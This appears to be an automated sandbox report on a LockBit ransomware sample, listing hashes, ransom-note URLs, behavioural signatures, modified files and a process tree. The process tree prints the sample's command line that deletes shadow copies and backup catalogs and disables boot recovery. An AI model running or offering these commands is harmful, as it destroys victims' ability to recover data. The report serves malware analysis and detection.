Analysis
- max time kernel: 133s
- max time network: 45s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 08-05-2022 16:33
Static task: static1
Behavioral task: behavioral1
- Sample: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
- Resource: win10v2004-20220414-en
General
- Target: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
- Size: 184KB
- MD5: 112c68cbae5ed25313f277f0a7721ecf
- SHA1: 5a7420f8fe3b81647714b16eed52bfc3ce149d5a
- SHA256: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297
- SHA512: fd433cefa7e9a9e0edf85d068644e0749bc260d17ef31dd25b953a5ca2e69a974a491c285c503b6aa3588ea2e5d4a5d9015c8f4f25746f3905a443d6ba4c143a
Malware Config
Extracted from: C:\Program Files\7-Zip\Restore-My-Files.txt
Family: lockbit
URLs:
- http://lockbit-decryptor.top/?96B283EF5B7ACD4CC03BD35F28F1ECAF
- http://lockbitks2tvnmwk.onion/?96B283EF5B7ACD4CC03BD35F28F1ECAF
Signatures
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
- pid 2800 bcdedit.exe
- pid 2812 bcdedit.exe
-
Processes:
- pid 2824 wbadmin.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (process: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe\"" (process: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe)
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
- pid 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe (64 identical rows, one per IoC, all from pid 1836)
-
Drops file in Program Files directory 64 IoCs
Processes: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe (the process column is this executable for every row below)
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar
- File opened for modification: C:\Program Files\7-Zip\Lang\he.txt
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar
- File created: C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\Restore-My-Files.txt
- File opened for modification: C:\Program Files\7-Zip\Lang\io.txt
- File created: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\Restore-My-Files.txt
- File created: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\Restore-My-Files.txt
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties
- File created: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\Restore-My-Files.txt
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa
- File opened for modification: C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\chkrzm.exe.mui
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png
- File opened for modification: C:\Program Files\CopyReset.rar
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\Europe\Riga
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\Africa\Cairo
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\America\Nome
- File created: C:\Program Files\VideoLAN\VLC\lua\sd\Restore-My-Files.txt
- File opened for modification: C:\Program Files\Windows Media Player\es-ES\wmpnetwk.exe.mui
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\settings.html
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\css\currency.css
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar
- File created: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\Restore-My-Files.txt
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\America\Cancun
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_SelectionSubpicture.png
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar
- File opened for modification: C:\Program Files\7-Zip\Lang\hu.txt
- File opened for modification: C:\Program Files\Microsoft Games\Chess\it-IT\Chess.exe.mui
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings
- File created: C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\Restore-My-Files.txt
- File opened for modification: C:\Program Files\7-Zip\Lang\hr.txt
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\Europe\Dublin
- File opened for modification: C:\Program Files\Java\jre7\lib\security\java.policy
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo
- File opened for modification: C:\Program Files\DVD Maker\directshowtap.ax
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja
- File opened for modification: C:\Program Files\Microsoft Games\Purble Place\de-DE\PurblePlace.exe.mui
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\gadget.xml
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule
- File opened for modification: C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- pid 1020 vssadmin.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
- pid 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe, vssvc.exe, WMIC.exe, wbengine.exe
- Token: SeTakeOwnershipPrivilege, pid 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
- Token: SeDebugPrivilege, pid 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
- Token: SeBackupPrivilege, pid 2024 vssvc.exe
- Token: SeRestorePrivilege, pid 2024 vssvc.exe
- Token: SeAuditPrivilege, pid 2024 vssvc.exe
- pid 2712 WMIC.exe: the following sequence of 20 token adjustments is recorded twice (40 rows): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- Token: SeBackupPrivilege, pid 2884 wbengine.exe
- Token: SeRestorePrivilege, pid 2884 wbengine.exe
- Token: SeSecurityPrivilege, pid 2884 wbengine.exe
-
Suspicious use of WriteProcessMemory 19 IoCs
Processes: c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe, cmd.exe
- PID 1836 wrote to memory of 960: source 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe, target cmd.exe (4 rows)
- PID 960 wrote to memory of 1020: source 960 cmd.exe, target vssadmin.exe (3 rows)
- PID 960 wrote to memory of 2712: source 960 cmd.exe, target WMIC.exe (3 rows)
- PID 960 wrote to memory of 2800: source 960 cmd.exe, target bcdedit.exe (3 rows)
- PID 960 wrote to memory of 2812: source 960 cmd.exe, target bcdedit.exe (3 rows)
- PID 960 wrote to memory of 2824: source 960 cmd.exe, target wbadmin.exe (3 rows)
Processes
-
C:\Users\Admin\AppData\Local\Temp\c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe"
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe (depth 2, child of the sample)
    Command line: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe (depth 3)
      Command line: vssadmin delete shadows /all /quiet
      - Interacts with shadow copies
    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      Command line: wmic shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\bcdedit.exe (depth 3)
      Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
    C:\Windows\system32\bcdedit.exe (depth 3)
      Command line: bcdedit /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit
    C:\Windows\system32\wbadmin.exe (depth 3)
      Command line: wbadmin delete catalog -quiet
      - Deletes backup catalog
C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\wbengine.exe (depth 1)
  Command line: "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\vdsldr.exe (depth 1)
  Command line: C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe (depth 1)
  Command line: C:\Windows\System32\vds.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- \??\PIPE\srvsvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (All four values are the digests of zero-length input; the captured named-pipe content is empty.)
- memory/960-58-0x0000000000000000-mapping.dmp
- memory/1020-59-0x0000000000000000-mapping.dmp
- memory/1836-54-0x0000000076011000-0x0000000076013000-memory.dmp (Filesize: 8KB)
- memory/1836-55-0x000000000338B000-0x00000000033A2000-memory.dmp (Filesize: 92KB)
- memory/1836-56-0x0000000000240000-0x0000000000266000-memory.dmp (Filesize: 152KB)
- memory/1836-57-0x0000000000400000-0x00000000031E1000-memory.dmp (Filesize: 45.9MB)
- memory/2712-60-0x0000000000000000-mapping.dmp
- memory/2800-61-0x0000000000000000-mapping.dmp
- memory/2812-62-0x0000000000000000-mapping.dmp
- memory/2824-63-0x0000000000000000-mapping.dmp
- memory/2824-64-0x000007FEFC461000-0x000007FEFC463000-memory.dmp (Filesize: 8KB)